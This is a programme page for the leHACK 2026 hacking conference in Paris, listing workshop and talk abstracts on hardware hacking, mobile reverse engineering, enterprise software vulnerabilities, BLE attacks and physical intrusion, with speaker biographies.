keep digging for that root shellStill wondering how to gain root access to a device via hardware ? Why not trying yourself ? Again ? This workshop will equip you with the skills and knowledge to understand the basics of hardware hacking . In this workshop, you may : - Learn what UART is and why it's a crucial interface for embedded systems. - Set Up Your Environment: Get your tools ready, including serial adapters and terminal software. - Discover how to physically connect to a device's UART pins and establish a serial connection. - How to interact with the device's shell and gain root access.
leHACK 2026
LE MEILLEUR DES MONDES édition
leHACK redémarre… L’édition 2026 aura lieu
Du vendredi 26/06 au samedi 27/06/2026 (+ toute la nuit !)
L'appel à propositions est terminé. Nous finalisons la liste des candidats. La sélection des intervenants sera annoncée très prochainement.
leSHOP: leHACK - 2026 - Le Brave New World
26 juin 2026 - 28 juin 2026
PASS
FLAVOR
PRICE
SHOP
REMAINING
PASS 2 JOURS - EARLY BIRD
EARLY BIRD
48€
SOLD OUT
PASS 2 JOURS - LATE BIRD
LATE BIRDS
80€
INCOMING
PISTES DE CONFÉRENCE
Les talks de la conférence sont publiés au fur et à mesure de leur sélection par le comité. Ce travail est en cours ; le calendrier n’est pas définitif.
Qu'est-ce que leHACK ?
leHACK est le plus grand et le plus ancien événement de la scène hacking française. Lire la suite.
Partenaire de leHACK 2026
leHACK est un événement à but non lucratif. Si vous souhaitez associer votre marque à l'événement et contribuer activement à rendre l'événement possible, téléchargez notre pack sponsor.
leHACK TRACKS (Travail en cours)
📱 APPLICATION WEB MOBILE INSTALLABLEworkshops TRACK View track >
Your favorite Android mobile apps or smart TV are probably fortresses: obfuscated code, anti hooking defenses, encrypted protocols. Traditional RE tools? Weeks of manual grinding. But what if you could teach your hooks to evolve, fuzz vendor services for hidden root commands, and let an AI orchestrate the entire RE workflow? In this hands-on workshop, you'll learn to autopsy mobile applications using Reversense, a free collaborative reverse engineering platform now available as open source. Unlike traditional tools that require weeks of manual analysis, Reversense automates the discovery, modeling, and instrumentation of mobile apps in their real execution context. You'll work through 3 real-world scenarios: - Hardened App Security Audit : Identify sensitive data and bypass security mechanisms, such as anti-hooking, using self-improved hooks and dynamic modeling. - Discovery of Undocumented ADB Commands : Use combination of built-in fuzzing engine, and cross-app hooking to uncover hidden vendor backdoors and factory test modes in Android devices. - AI-Powered Reverse Automation : Leverage MCP (Model Context Protocol) integration to orchestrate complex multi-stage reverse engineering workflows.
Georges-Bastien MICHEL (@FrenchYeti)
Understand the fundamentals of reverse engineering Android applications. Learn to use debugging tools to analyze Android app behavior. Bypass security mechanisms using Frida scripts. Sniff and replay Bluetooth Low Energy (BLE) communications. Modify Smali code to alter app functionality. Reverse engineer native libraries used in Android apps. Perform Man-in-the-Middle (MITM) attacks on HTTPS services.
MadSquirrel Benoît Forgette
Most reverse engineering workflows treat a binary as a static artifact. Dynamic Binary Instrumentation flips that: instead of reading code, you *watch it run*, intercepting every instruction and memory access with nothing but Python. This workshop is a hands-on introduction to DBI using PyQBDI. Attendees go from zero to writing instrumentation scripts that trace execution, inspect runtime state, instrument native libraries, and ultimately bypass anti-debugging protections to extract a hidden flag. They leave with reusable scripts and the foundations to apply QBDI in professional engagements, CTF challenges, or personal research. QBDI is an open-source framework developed at Quarkslab, supporting Linux, Windows, Android, and macOS. It has been used in practice to break whitebox cryptographic implementations, deobfuscate VM-protected binaries, and analyze Android native libraries without source code
Victor Houal / Laurent Laubin
Ce workshop introduit un framework dédié aux attaques de protocoles sans-fil, WHAD, avec un focus tout particulier sur le protocole Bluetooth Low Energy. Il fait écho au talk soumis par l'auteur sur le même sujet, et permettra de mettre en pratique les attaques évoquées dans ce dernier sur de véritables équipements connectés.
Virtualabs
The world of Web Hacking is evolving, and with it, our tooling must evolve as well. Caido, the new guy on the HTTP Proxy block, brings a new set of tools and capabilities to web hackers that minimize friction and increase efficiency in your hacking process. Join us as we explore: * HTTPQL Search * Caido Workflows (easy to understand & integrate low-code/no-code automation) * Environment Variables (no, not that kind) * Organization/Note Taking * Shift - Caido AI Integration * and much more
Emile Fugulin
Christopher Guay
conferences TRACK View track >
26/06/2026
PLACEHOLDER
L'écosystème Microsoft Entra ID et Microsoft 365 est devenu en 2025-2026 l'épicentre des compromissions cloud en entreprise. Les rapports sont unanimes : l'identité est le premier vecteur d'attaque, et les environnements M365 représentent la surface d'attaque la plus convoitée : des APT étatiques aux opérateurs de Phishing-as-a-Service. Le talk couvrira les techniques les plus récentes et impactantes, dont l'abus FOCI (Family of Client IDs), l'extraction de tokens OAuth depuis les caches Windows (TokenBroker, WAM, Azure CLI), le contournement des politiques MFA et Conditional Access, et les angles morts de la détection. En fil rouge, une démonstration live d'OAuthBandit v2, outil open-source de post-exploitation spécialisé dans l'extraction, la validation et l'exploitation de tokens Microsoft OAuth depuis des endpoints compromis : avec le release public de nouvelles fonctionnalités avancées. Cette présentation est un retour terrain brut. Basée sur des cas concrets de réponse à incident et de missions offensives sur des tenants M365 compromis, elle décortique les kill chains modernes observées en production : de l'accès initial par phishing OAuth jusqu'à la prise de contrôle complète du tenant, en passant par le mouvement latéral cloud-to-cloud et la persistence invisible.. ainsi que d’autres surprises ... L'objectif : armer les défenseurs avec la compréhension fine des TTPs modernes sur M365/Entra ID et des stratégies concrètes de détection et de réponse.
Kondah Hamza
Hamza Kondah est ingénieur cybersécurité senior, consultant indépendant et fondateur de Hexadream Academy. Microsoft MVP en Sécurité des Entreprises depuis plus de 13 ans , il intervient quotidiennement sur des missions de réponse à incident, d’audit offensif et de hardening sur des environnements Entra ID, Azure et Microsoft 365. Formateur reconnu avec plus de 13 ans de présence sur le marché, il a formé des milliers de professionnels sur la sécurité des écosystèmes Microsoft.
Windows shortcut (.LNK) files remain a persistent threat vector. While simple bypasses like adding spaces exist, this session reveals undocumented techniques for deceptive payload delivery and execution. We’ll explore why these methods work, the black-box research methodology used to find them, and the defensive implications. We are also introducing an open-source tool for security teams to simulate and defend against these advanced LNK-based attacks.
Wietze Beukema
Wietze has been hacking around with computers for years. Originally from the Netherlands, he currently works as a Lead Threat Detection & Response Engineer in London. As a cyber security enthusiast and threat researcher, he has presented his findings on topics including attacker emulation, PowerShell obfuscation, command-line obfuscation and DLL Hijacking at a variety of security conferences. By sharing his research, publishing related tools and his involvement in the open-source projects such as LOLBAS, HijackLibs and ArgFuscator, he aims to give back to the community he learnt so much from.
SAP is widely used by Fortune 500 companies and often underpins critical business processes, yet its attack surface is difficult to evaluate due to its proprietary nature. In this talk, I retrace how I approached that problem in practice: starting from a single thread and following it through reverse engineering, archive format internals, black-box fuzzing, and exploit development. Along the way, I show how that process led to multiple vulnerabilities across different SAP components, ranging from local privilege escalation to remote unauthenticated memory corruption. I also cover the practical role LLMs played during the research, as a tool for crash triage, root-cause analysis, and exploit development.
Tao Sauvage
Tao Sauvage is Director of Research at Anvil Secure, specializing in vulnerability research, reverse engineering, and offensive security. He has conducted research across mobile, embedded, and industrial systems, leading to multiple CVEs affecting vendors including Google, Garmin, SAP, Okta, ASUS, Antaira, and Linksys.
Whilst organisations and individuals continue to heavily focus on digital initial access vectors, many continue to overlook physical access. OVERCAST PANDA’s operatives, however, do not discriminate against the physical realm to achieve their targeting objectives.
Jake and Antoine will walk you through real-world intrusions where Chinese state operatives target high-value individuals visiting China and deploy backdoors directly onto their corporate devices. Turning a simple business trip into a full corporate compromise.
Because sometimes the only zero-day you need is a hotel housekeeping schedule.
Jake Lomas
Jake is an Intrusion Analyst in CrowdStrike’s Threat Hunting service, Falcon OverWatch. His work focuses on hunting and disrupting nation state adversarial operations in customer networks. He also previously worked in CrowdStrike’s MDR service, Falcon Complete, where he responded to, contained and remediated a broad range of cyber intrusions.
Antoine Vianey-Liaud
Antoine leads a team of threat hunters at CrowdStrike, finding creative ways to uncover and disrupt sophisticated intrusions on a daily basis.
Avril 2026 : Anthropic dévoile Claude Mythos, capable de trouver des 0-days dans tous les OS majeurs, et réserve son accès à 40 organisations triées sur le volet. Faut-il vraiment un frontier model classifié pour faire de la recherche offensive sérieuse en 2026 ?
Ce talk défend l’inverse. DARPA AIxCC l’a prouvé en 2025 : les systèmes battent les modèles. Et en 2026, les modèles ouverts (Gemma 4, Qwen 3.6) atteignent des scores d’orchestration dignes des frontier models, sur du matériel accessible. Les papiers récents valident des workflows spécialisés en synthèse de harness, triage, analyse de protocoles et reverse engineering.
Au programme : ce que Mythos change vraiment, les briques accessibles aujourd’hui, et des cas concrets de recherche offensive sans frontier model.
Patrick Ventuzelo
CEO & Founder of FuzzingLabs (Paris, ~28 people). We’re an offensive cybersecurity company specialized in firmware, binaries, and embedded systems.
WSO2 products (API Manager, Identity Server) are massively deployed across critical infrastructure (banking, insurance, defense, government) in France and worldwide. During offensive security engagements at Ambionics Security (LEXFO), we discovered over a dozen critical 0-day vulnerabilities in WSO2's shared Java codebase and achieved RCE on dozens of client instances across French organizations. The vulnerabilities span the full spectrum: authentication bypasses via path parameter confusion, full-control SSRF through a 2008-era legacy proxy, systemic CSRF on every SOAP administration service, account takeover via flawed password reset logic, and multiple RCE vectors through Siddhi Streaming SQL, H2 database UDFs, SQLite file-write to JSP webshell, and unsandboxed JavaScript execution in the JVM. But the real challenge came next. Facing a properly hardened deployment (management console firewalled off, no admin ports exposed, zero outbound connectivity), we chained 7 N-days into a single-request unauthenticated RCE through the only reachable endpoint: the API Gateway HTTPS port. The chain combines blind XXE, SSRF relay, HTTP request smuggling via CRLF injection in Axis2 headers, and privilege escalation into a reliable exploit against near-current WSO2 versions. Packed with Java web exploitation tricks, the talk concludes with a live demo: one request, seven vulnerabilities, a reverse shell.
Noel MACCARY
Pentester at Ambionics Security (LEXFO), specializing in web vulnerability research and exploitation on widely deployed enterprise software. Discovered and responsibly disclosed multiple critical 0-day vulnerabilities in WSO2 products (6+ CVEs), resulting in patches across the WSO2 ecosystem.
Espressif designs small, low-cost system-on-chips primarily intended for wireless connectivity such as Wi-Fi and Bluetooth Low Energy. These SoCs are widely used as the networking and control component in IoT and embedded products, handling external inputs, protocol parsing, and communication with the rest of the system. Espressif has publicly reported cumulative shipments on the order of one billion chips, with hundreds of millions of devices deployed in the field, making vulnerabilities in shared firmware components a product-scale security concern rather than an isolated implementation detail. In this talk, we present a set of real security vulnerabilities identified in Espressif’s software development kit (SDK) and USB stack. Rather than focusing on vulnerability counts, we explain how we deliberately filtered out noise to concentrate on issues that are reachable, cross trust boundaries, and have realistic security impact in shipped products. We briefly introduce the analysis approach that enabled this triage, including graph-based code exploration, backward slicing from security-sensitive operations, reachability and exploitability reasoning, and threat-model awareness. We then deep-dive into a USB vulnerability, walking through the vulnerable code path, violated assumptions, and attacker-controlled inputs. Where available, we present ongoing exploitation work and discuss the practical challenges and constraints of turning such bugs into reliable exploits on embedded targets. Finally, we connect these findings to real-world Espressif-based products, illustrating how low-level firmware vulnerabilities can propagate to product-level security risks. We conclude with lessons learned for embedded developers and security engineers on how to reason about exploitability, prioritization, and impact in modern IoT and embedded software stacks.
Maxime
Maxime Rossi Bellom is a security expert and co-founder of SecMate (https://secmate.dev), a company focused on uncovering security issues from embedded software. He specializes in the hardware and low-level software security of mobile devices and embedded systems, and has extensive experience uncovering real-world vulnerabilities in widely deployed firmware. He enjoys working on secure boot mechanisms and security chips embedded in smartphones.
Ramtine
Ramtine Tofighi Shirazi is a computer scientist and co-founder of SecMate (https://secmate.dev), a company focused on uncovering security issues in embedded software. He specializes in static analysis and automated vulnerability detection, with a focus on bridging the gap between security research and engineering workflows in regulated industries. His work has been published at JLAMP, SPRO, and SSPREW. He holds a PhD in Computer Science.
Est ce que le reverse c’est IDA, R2, Frida, Ghidra, QEMU, et bien d’autres ? Non, c’est tout ça, et tout ça ce n’est pas le secret que l’on veut découvrir, la DRM que l’on veut casser, ce n’est que le moyen. Aujourd’hui, après Dexcalibur, et plus de 5 ans de développement nous libérons en open source Reversense, une plateforme d’automatisation du reverse qui crée une projection de votre application mobile ou votre binaire dans une représentation universelle interrogeable, analysable et exécutable. Reversense offre une interface graphique permettant de naviguer et analyser la projection de l’application, statiquement ou à travers les exécutions, ainsi que de nombreuses fonctionnalités en dehors du champ des outils traditionnels : automatisation du parcours de l’interface, génération et édition automatique des hooks Frida qui vont muter d’une exécution à l’autre, instrumentation cross-process ou cross-device, fuzzing inapp, gestion d’une ferme de téléphones, … Le talk présente l’outil - l’idée et l’usage - mais surtout comment nous avons repensé le métier de reverser à une ère où le binaire est omniprésent, le temps pour reverser toujours plus réduit mais où nous voulons garder du plaisir.
Georges-Bastien Michel (@FrenchYeti)
Georges-Bastien MICHEL – aka @FrenchYeti – is a security researcher, speaker (NorthSec, SSTIC, insomni’hack, …), trainer and OSS developer with a strong experience in de-obfuscation, Android security, and TEE vulnerability assessment. He created Dexcalibur and Interruptor (Frida-based userland syscall tracer), among a long list of OSS projects, and contributed to Frida, R2, APKiD and Ghidra projects. He has been vulnerability researcher and reverse engineer in several companies including Thales Lab and UL. Since 2020, he has dedicated his time to building Reversense, a mobile reverse engineering platform – which he is releasing as open source. (Github: https://github.com/FrenchYeti)
What if the backdoor phase required no code at all? Last year at leHack, I introduced a framework for reasoning about unconventional persistence — backdoors built from configuration and trust rather than malware. The audience asked for more demos, more operational reality. This talk delivers. Through live demonstrations on realistic environments, we show how subtle, codeless modifications to a system can create invisible conditions for future code execution — triggered later through channels no defender would think to suspect. No binary, no shell, no payload on disk. Just changes that look benign, pass audits, and wait patiently. Built from tested tradecraft, real red team operations, and ongoing research.
m101
Modified drone companion apps claiming to unlock FCC transmission modes are widely circulated among hobbyist communities, yet their internal mechanisms remain largely undocumented. This talk presents a reverse engineering case study of such a patched Android application, revealing how runtime instrumentation frameworks—specifically Frida—are embedded and abused to dynamically alter application behavior. Through differential APK analysis, deobfuscation of injected JavaScript Frida payloads, and inspection of native libraries, we uncover a full instrumentation pipeline designed to hook critical Java class methods to bypass regulatory constraints. The session concludes with a discussion on technical limitations, potential firmware-level barriers, and implications for mobile app integrity.
Klcium
Pentester working high on the stack by day and exploring low-level systems by night.
Placeholder
27/06/2026
Fifteen years ago, compromising an organization could be as simple as walking through the front door with confidence, dropping a USB drive in a parking lot, or sending a poorly crafted phishing email. At NDH2K11, Jayson E. Street demonstrated just how easily organizations could be compromised using little more than human trust and a bit of creativity. Fast-forward fifteen years. The technology landscape has transformed—AI-generated voices can impersonate executives, phishing campaigns are automated at scale, and attackers now leverage OSINT and generative technologies that dramatically lower the barrier to entry. Yet despite this technological evolution, one uncomfortable truth remains: the fundamental weaknesses, attackers exploiting humans have not changed. In this retrospective talk, Jayson revisits real examples from his early work compromising banks and organizations through social engineering and physical infiltration, comparing them to modern attacks involving phishing, vishing, and AI-driven deception. Through stories, demonstrations, and lessons learned across more than a decade of adversarial testing, he shows how attackers continue to succeed not because of cutting-edge exploits—but because organizations still rely on the same fragile assumptions about trust, process, and human behavior. The session concludes by challenging the industry’s traditional approach to security validation and introduces a modern framework for adversarial simulation designed to help organizations experience real-world attacks safely before criminals deliver them for real. After fifteen years of evolving tools, tactics, and technology, the biggest lesson may be the simplest one: Attack methods change. Human nature does not.
Jayson E. Street
Squirrel.Windows est l’un des frameworks de mise à jour automatique les plus utilisés sur Windows. Il est notamment utilisé par Discord, Slack, GitHub Desktop et de nombreuses applications Electron utilisées par des millions d’utilisateurs. Dans ce talk, je présente les résultats d’un audit de sécurité complet du pipeline de mise à jour de Squirrel.Windows qui a révélé 8 vulnérabilités affectant plusieurs couches du système de mise à jour. Cette recherche montre que plusieurs mécanismes de sécurité attendus dans un système d’auto-update moderne sont absents ou défaillants : absence de signature du manifest de mise à jour, vérification d’intégrité circulaire des packages, absence de vérification Authenticode, vulnérabilités Zip Slip permettant l’écriture arbitraire de fichiers, parsing XML vulnérable aux attaques XXE et gestion dangereuse des répertoires temporaires. En combinant ces failles, un attaquant capable d’intercepter le trafic de mise à jour peut compromettre entièrement le processus d’update et atteindre une exécution de code à distance lors de l’installation d’une mise à jour. Le talk inclura plusieurs démonstrations pratiques montrant : - l’injection d’un manifest de mise à jour malveillant dans un scénario MITM - l’exploitation d’un package .nupkg forgé permettant de sortir du répertoire de l’application - l’impact d’autres vulnérabilités comme XXE ou la vérification delta défaillante Nous terminerons par une analyse des erreurs de conception observées dans ce type de framework et des recommandations pour concevoir des systèmes de mise à jour sécurisés.
Lucas Torres (Rooting)
n8n is an open-source workflow automation platform with AI agents, used by thousands of organizations worldwide. With more than 70,000 publicly accessible instances on Shodan and recent critical CVEs listed in CISA's Known Exploited Vulnerabilities catalog, it has become a high-value target for attackers. This talk first explores what attackers can do with leaked n8n credentials. Starting from real-world n8n JWT tokens exposed on GitHub, we found around 1,300 publicly reachable instances. Among those, 25% authenticated successfully, giving us a live dataset of production n8n instances to answer one question: what can an attacker do once inside? We built three attack chains to find out. First, we demonstrate Remote Code Execution leveraging real-world workflow abuse and existing CVEs, showing how n8n's legitimate execution capabilities turn into a direct shell. Second, we walk through credentials enumeration, extraction, and exfiltration: n8n instances store third-party API keys, OAuth tokens, and database credentials directly in workflows, making a single JWT a skeleton key to an organization's entire integration stack. Third, we reveal original cryptographic weaknesses in n8n's native secret handling, what we call n8ive crypto, exposing design flaws that allow offline secret recovery and privilege escalation. Beyond the practical attacks, this talk raises a broader question: when automation platforms become the central hub of modern infrastructure, an account compromise is now a launchpad for attacks across the entire stack
Guillaume Valadon
Guillaume is a Cybersecurity Researcher at GitGuardian. He holds a PhD in networking. He likes looking at data and crafting packets. He co-maintains Scapy. And he still remembers what AT+MS=V34 means!
Souvent sous-estimée par les organisations, l’intrusion physique constitue pourtant un vecteur de compromission particulièrement efficace, en dépit des investissements croissants dans les dispositifs techniques et humains. Cette conférence propose une analyse concrète des mécanismes qui mènent au succès ou à l’échec d’une intrusion physique, en s’appuyant sur des retours d’expérience, des cas réels et des missions de red team. Nous examinerons les facteurs clés de réussite, tels que l’ingénierie sociale, les failles organisationnelles ou la surestimation des contrôles techniques, ainsi que les éléments conduisant à l’échec : vigilance du personnel, procédures adaptées, culture de sécurité, ou encore certaines limitations imposées par les clients. L’objectif est de dépasser une vision purement technologique afin de mettre en lumière le rôle central de l’humain et des processus.
Joker2a
Nicolas Aunay, alias Joker2a, est un pentester français, spécialisé dans l’intrusion physique et la sécurité offensive. Il participe à des conférences et ateliers de cybersécurité, comme BSidesLuxembourg ou Le Hack à Paris et partage ses connaissances avec la communauté InfoSec.
Venez découvrir le quotidien des missions terrain sur la partie fraude documentaire, un entre deux entre le pentest et le redteam!
Dans le domaine de la lutte contre la fraude depuis 2016, Cyber Moustache teste le parcours du fraudeur pour mieux le comprendre et proposer de la remédiation aux sociétés qui l'engagent pour les frauder sous contrat!
Cybermoustache
macOS has long been perceived as a low-risk platform, often treated as a secondary concern compared to Windows and Linux. That assumption no longer holds. As MacBooks become increasingly common in corporate environments, adversaries have followed, turning macOS into a viable and attractive target for real-world attacks. This talk presents a practical, research-driven analysis of the recent evolution of macOS malware. Through hands-on experiments and real techniques, it explores how modern threats achieve execution, fileless operation, persistence, and evasion by abusing native macOS components. As organizations continue to expand their macOS footprint, security strategies often lag behind. Many defensive teams remain heavily focused on Windows and Linux, leaving macOS environments under-monitored, under-tested, and misunderstood. In this talk, I will share my journey researching and developing macOS malware from an adversarial perspective. The session focuses on how attackers leverage legitimate macOS mechanisms to achieve: - Initial execution and in-memory (fileless) techniques - Persistence through native system components - Evasion of endpoint security and detection tools Each technique is demonstrated using real experiments, with analysis of macOS internals and the behavior of commonly deployed security solutions. Rather than theoretical concepts, the talk emphasizes how these attacks work in practice, and why many defenses fail to stop them. The presentation also addresses a persistent myth, especially common in the Brazilian security community, that macOS is inherently safer or “immune” to malware. By examining real attack paths and defensive gaps, the session highlights the urgent need for improved detection strategies, visibility, and threat modeling on macOS. Attendees will learn: - How modern malware abuses internal macOS mechanisms - Real-world persistence techniques observed in active threats - How security tools react or fail, when faced with these attacks - Practical mitigation strategies to reduce exposure and improve detection This talk is intended for defenders, red teamers, malware researchers, and anyone interested in understanding how adversaries are actively adapting to the macOS ecosystem.
Zoziel Freire
I have a degree in Information Systems and a postgraduate degree in Forensic Computing, and Cyber Security. With over 16 years of experience in the information technology sector, I have had the opportunity to provide services to several companies across various segments in Brazil and other countries. Throughout my career, I have gained solid experience in Incident Response, Forensic Analysis, Threat Hunting, Penetration Testing, Malware Analysis, Reverse Engineering, and Development. I have also worked on Ransomware incidents, both in Brazil and in other countries. I have actively contributed to the information security community, participating in Brazilian events. Sometimes I spend time bypassing EDR and AntiVirus, and testing operating system gaps. I am passionate about music, especially guitar and piano, and I am a fan of Chaves and Chapolin.
This talk aims at reviewing and explaining in detail the technical Sighax exploit. The Nintendo 3DS, despite having layered security based on a strong chain of trust and a privilege split between two processors ARM11 and ARM9, implements improper validation of the RSA PKCS#1 v1.5 padding in the ARM9 bootrom code. This vulnerability, combined with a custom uncautious ASN.1 parser, makes it possible to bruteforce specific RSA signatures causing the signature's hash to be computed against itself on the stack, allowing to bypass a signature check. We will also discuss how this exploit, coupled with the design of Nintendo's FIRM file format, allows to dump the protected bottom half of the ARM9 bootrom, which is locked away by the time any firmware is loaded. The goal is to provide a clear overview of how a console can go from executing confined userland homebrew to cold boot, pre firmware persistence with full access over the console in just a few mistakes. We will go over the 3DS security architecture with its ARM9 / ARM11, the FIRM boot chain, the RSA PKCS#1 v1.5 padding implementation flaw, the ASN.1 parser mistakes and how "perfect" signatures were bruteforced to take advantage of these issues in order to sign any firmware stored in the console eMMC
Cyprien Molinet (@cypelf)
I began cybersecurity and development in high school for fun, wondering how computers worked. I grew up with Nintendo consoles and I was always curious of how they work internally. I remember hacking my Wii back in 2016, following tutorials on the internet, not understanding what I was doing. It felt like magic, and I found it amazing how people were able to do that. That’s how I first entered cybersecurity. I joined a french community of 3ds hacking, and started making online video tutorials about how to do it myself, for the french audience. As I continued to grow up, I graduated from an engineering school. I worked in apprenticeship at the Ministry of the Interior for one year, then at Synacktiv for 3 years, where I spent two years doing pentests and one year doing security products development. I’m now working as educational lead for development and cybersecurity at Ecole 2600 for the cybersecurity specialized bachelor. During these last few years, I also contributed to the cybersecurity scene through contributions and activity in the Root-Me association, mainly between 2021 and 2024. I spent time creating reverse engineering challenges, including one on a Nintendo Switch homebrew. Among the few talks that I made for the Root-Me organized CTF celebrating the 10k members on the discord server, I gave one specifically on the Fusée Gelée vulnerability found in the Nintendo Switch bootrom USB protocol handling, allowing arbitrary code execution at the highest level of privilege, just like Sighax here for the Nintendo 3DS. At the same time, I also participated in many CTF between 2021 and 2024, and eventually qualified in 2023 at the French CyberSecurity Challenge (FCSC) for the official French CTF team going at the European Cybersecurity Challenge (ECSC). I qualified from my scores at the general scoreboard, in the reverse category, and in the hardware category. From my experience transmitting my knowledge at School 2600, you can be guaranteed the talk will be clear to follow and rich in content! I can also certify my content will be 100% technical, hand made stuff and 0% AI slop. Important point nowadays, after all!
Quand on pense au warez on pense jeux video , la suite adobe ou microsoft word. Mais il existe une autre scène qui existe aussi depuis longtemps, c'est la scène pour les logiciels de contrôle-commande industrielle.
Ces logicielles sont les environnements de développement et d'interactions des systèmes de contrôle physique, de la programmations des automate industrielle, en bref, les logicielle qui font fonctionner notre monde industriel.
Nous allons essayer ici d'analyser ce marché via deux angles.
D'un côté une analyse technique en regardant certains crack keygen, mais aussi des tools contournant la sécurité intégrer des automate pour voir ce qu'ils font techniquement, et constater si leurs actions sont légitimes ou si ce n'est que du sucre de l'eaux et beaucoup de mallware.
D'un autre côté, la distribution, les vendeurs et les clients cible de ce dernier.
biero-el-corridor
Avec un parcours atypique qui a commencé en boulangerie et qui c’est terminer en master cyber il s’est intéressé au monde de la sécurité des systèmes industrielle après la suivie d’un cours d’un docteur sur le sujet, depuis fin 2022, Actuellement freelance dans ce domaine.
Le protocole Bluetooth Low Energy et ses vulnérabilités, tout le monde les connaît car elles font régulièrement la une des actualités et 2026 n'a pas dérogé à la régle. Mécanisme d'appaîrage simplifié exploitable par des pirates, communications non-chiffrées laissant fuiter des informations sensibles, robots humanoïdes compromis avec une injection de commande transmise par BLE, injection de flux audio dans des écouteurs, autant de problèmes révélés ces dernières années grâce à de nombreux chercheurs en sécurité et qui mettent à mal l'image ce protocole et des équipements qui l'emploient. Mais connaissez-vous vraiment *tous* les moyens à votre disposition permettant de compromettre de tels équipements ? Dans ce talk, nous allons aborder des aspects moins connus du protocole Bluetooth Low Energy et la manière dont ces derniers peuvent être exploités pour compromettre l'intégrité et la sécurité d'équipements connectés. Certaines de ces techniques ont été découvertes lors de l'analyse de différentes implémentations, voire directement lors de tests effectués sur des équipements domotique ou des smartphones, d'autres sont très peu connues ou n'ont jamais été publiées à ce jour. Si vous êtes expert sur ce protocole de communication ou simple néophyte curieux de découvrir des attaques avancées, ce talk peut vous apprendre des choses assez surprenantes.
virtualabs
Tombé dans la marmite du Bluetooth Low Energy il y a bientôt plus de 10 ans, Virtualabs est l’auteur de plusieurs outils liés à ce protocole de communication et n’a malheureusement pas réussi à tourner la page et s’intéresser à autre chose depuis tout ce temps. Il travaille en tant qu’ingénieur sécurité à Quarkslab depuis 2021, avec un focus particulier sur la rétro-ingérierie matérielle, logicielle, et les protocoles de communication sans-fil.
Les fréquences radio transportent toutes sortes de données, des communications aériennes aux télécommandes de voiture, et la plupart d'entre elles sont étonnamment faciles à intercepter. Ce talk vous montre comment fonctionne réellement le piratage radio. Pas besoin d'équipement coûteux ni d'années d'expérience. Avec les bons outils et les bonnes connaissances, le spectre devient enfin visible.
Beemo (Noë Flatreaud)
Breaking stuff for fun and profit Hi, I’m Noë Flatreaud. People may call me Beemo
I’m an IT Consultant, FOSS Advocate & Cybersecurity Researcher interested in cryptography. Currently living in France, working as an infosec speaker and advisor.
I like teaching.
I’m a part-time speaker and teacher. I taught Cryptography (MIT 6.875, CYP-01)
I taught Incident Response and Cybersecurity. I break things, for fun and profit.
I do hardware and software security research, mostly for fun but sometimes for profit.
What should you expect here?
Mostly short-to-mid length essays about anything that goes through my mind. I thought about doing it consistently, but it’s too much work for a lazy ass like me.
How can you contact me ?
You can find me on Github, Twitter, Mastodon, Linkedin or Medium
You also can email me if you so desire. I’m happy to talk about nearly everything.
Need privacy ? You can find my public key online or bellow : -----BEGIN PGP PUBLIC KEY BLOCK-----
Comment: A34F 8EF1 20A1 E177 588C 74EC 5692 E703 63D2 C426
Comment: Noë Flatreaud <nflatrea@mailo.com> xjMEZrtVshYJKwYBBAHaRw8BAQdAoS2/InzvpFldcDQAcrzSBkjjTOXvXvdR3IaH
9Xfu8JvNI05vw6sgRmxhdHJlYXVkIDxuZmxhdHJlYUBtYWlsby5jb20+wpMEExYK
ADsWIQSjT47xIKHhd1iMdOxWkucDY9LEJgUCZrtVsgIbAwULCQgHAgIiAgYVCgkI
CwIEFgIDAQIeBwIXgAAKCRBWkucDY9LEJqx1AQDiARyx1Qnj7QTDFG6zgUI+SCBY
6ybwz09XMMOUyFNYwQEAzHy9ixi8wKOV+EhxhysyDR0j+xtHZBJjnovGI1eAzA7O
OARmu1WyEgorBgEEAZdVAQUBAQdAtXZUa4JOQSxnYsdx2975cI9qAdN7Is56qSLT
XWW6skEDAQgHwngEGBYKACAWIQSjT47xIKHhd1iMdOxWkucDY9LEJgUCZrtVsgIb
DAAKCRBWkucDY9LEJlY0AP0a3K8k2TrK6bo9oB9VHlqgiB7k9ocrewJc2DnyO3Ae
IwD/USvjJseBzFCvWf676gJvCpgtDSKD7TJoXJkD1VuKKAs=
=Gsyx
-----END PGP PUBLIC KEY BLOCK-----
Les applications de “smart city” promettent sécurité, modernité et économies d’énergie. Sur le papier, tout est parfaitement sous contrôle. Dans la réalité… disons que c’est plus lumineux que sécurisé. Cette présentation propose l’analyse d’une application mobile permettant de contrôler l’éclairage public, signaler des zones dangereuses et partager sa position avec des proches. Officiellement, le système est protégé, restreint (et selon son créateur :“impiratable”). Dans les faits, une compréhension même modérée de son fonctionnement permet de contourner les restrictions géographiques et d’activer l’ensemble des lampadaires d’une ville (voire de centaines de communes) sans la moindre authentification. sign Mais ce n’est qu’un début. Des failles critiques permettent également d’identifier des utilisateurs supposément anonymes, de reconstituer leurs habitudes, d’accéder à des événements privés et de manipuler le partage de position en temps réel. À travers une analyse technique rigoureuse et un certain sens de la nuance, ce talk met en lumière une vérité simple : annoncer une sécurité avancée ne suffit pas à la rendre réelle.
MadSquirrel Benoît Forgette
Passionate about how systems work since my childhood and with an initial education in computer science, I gradually moved to the security of these systems and the electronic part of these equipments. Today, I work as a Cybersecurity Engineer in software and hardware reverse engineering at Quarkslab, where my daily work consists in disassembling equipments sent by our clients, then inspecting all their attack surfaces (hardware, radio, software, cloud). Then, we help our clients to find the best way to protect their systems and their equipments. In this work, the part that seems to me the most interesting is the automation/instrumentation/hijacking part. It is fascinating to see how much it is possible to hijack a piece of equipment from its original purpose. This is even more impressive when we talk about physical equipment which has an impact on its environment.
Avez-vous déjà tenté de vous infiltrer dans un événement hautement sécurisé ?
Probablement non — nous, si :).
À travers cette conférence, nous verrons comment les dispositifs de sécurité de certains des plus grands événements peuvent être contournés à l’aide de différentes méthodes, outils et techniques, allant de l’OSINT à l’ingénierie sociale.
À partir de cas réels d’intrusions physiques, nous décortiquerons leur architecture : périmètres, zones d’accès, rôles humains, accréditations etc…
Enfin, des démonstrations illustreront comment des dispositifs conçus pour protéger peuvent devenir exploitables dès lors que la validation repose sur des mécanismes humains.
SkyZe
Je suis SkyZe, curieux de nature, j’aime découvrir le fonctionnement des choses, les contourner mais aussi les défendre. C’est pour cela qu’aujourd’hui je suis actuellement Ingénieur Cybersécurité avec une forte passion pour tout ce qui touche de près ou de loin à l’intrusion physique.
Comment écouter le réseau 3G avec ce que l'on a sous la main ? Avec un récepteur TV, une antenne bricolé, gr-gsm et simple_IMSI-catcher.py !
Oros
